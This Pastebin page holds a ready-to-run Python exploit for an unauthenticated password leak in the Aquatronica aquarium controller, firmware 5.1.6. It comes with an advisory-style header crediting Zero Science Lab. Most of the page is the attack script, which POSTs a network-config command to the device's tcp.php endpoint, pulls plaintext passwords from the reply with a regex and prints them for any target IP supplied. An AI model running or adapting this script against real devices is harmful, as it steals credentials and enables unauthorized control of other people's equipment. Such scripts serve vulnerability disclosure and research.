Advertisement
FlyFar

Aquatronica Control System 5.1.6 - Information Disclosure

Jun 8th, 2024
474
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.39 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. #
  4. #
  5. # Aquatronica Control System 5.1.6 Passwords Leak Vulnerability
  6. #
  7. #
  8. # Vendor: Aquatronica s.r.l.
  9. # Product web page: https://www.aquatronica.com
  10. # Affected version: Firmware: 5.1.6
  11. #                   Web: 2.0
  12. #
  13. # Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy
  14. # to use, allowing you to control all the electrical devices in
  15. # an aquarium and to monitor all their parameters; it can be used
  16. # for soft water aquariums, salt water aquariums or both simultaneously.
  17. #
  18. # Desc: The tcp.php endpoint on the Aquatronica controller is exposed
  19. # to unauthenticated attackers over the network. This vulnerability
  20. # allows remote attackers to send a POST request which can reveal
  21. # sensitive configuration information, including plaintext passwords.
  22. # This can lead to unauthorized access and control over the aquarium
  23. # controller, compromising its security and potentially allowing attackers
  24. # to manipulate its settings.
  25. #
  26. # Tested on: Apache/2.0.54 (Unix)
  27. #            PHP/5.4.17
  28. #
  29. #
  30. # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  31. #                             @zeroscience
  32. #
  33. #
  34. # Advisory ID: ZSL-2024-5824
  35. # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
  36. #
  37. #
  38. # 04.05.2024
  39. #
  40.  
  41. import requests, html, re, sys, time
  42. from urllib.parse import unquote
  43.  
  44. program     = "TCP"
  45. command     = "ws_get_network_cfg"
  46. function_id = "TCP_XML_REQUEST"
  47.  
  48. print("""
  49.      _________         .    .
  50.     (..       \_    ,  |\ /|
  51.      \      O  \ /|  \ \/ /
  52.       \______    \/ |   \ /
  53.          vvvv\   \ |   /  |
  54.          \^^^^  ==   \_/   |
  55.           `\_   ===    \.  |
  56.           / /\_   \ /      |
  57.           |/   \_  \|      /
  58. ___ ______________\________/________aquatronica_0day___
  59.  | |
  60.  | |
  61.  | |
  62. """)
  63.  
  64. if len(sys.argv) != 2:
  65.     print("Usage: python aqua.py <ip:port>")
  66.     sys.exit(1)
  67.  
  68. ip = sys.argv[1]
  69. url = f"http://{ip}/{program.lower()}.php"
  70.  
  71. post_data = {'function_id' : function_id.lower(),
  72.              'command'     :     command.upper()}
  73.  
  74. r = requests.post(url, data=post_data)
  75.  
  76. if r.status_code == 200:
  77.     r_d = unquote(r.text)
  78.     f_d_r = html.unescape(r_d)
  79.     regex = r'pwd="([^"]+)"'
  80.     rain = re.findall(regex, f_d_r)
  81.  
  82.     for drops in rain:
  83.         print(' ',drops)
  84.         time.sleep(0.5)
  85. else:
  86.     print(f"Dry season! {r.status_code}")
  87.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement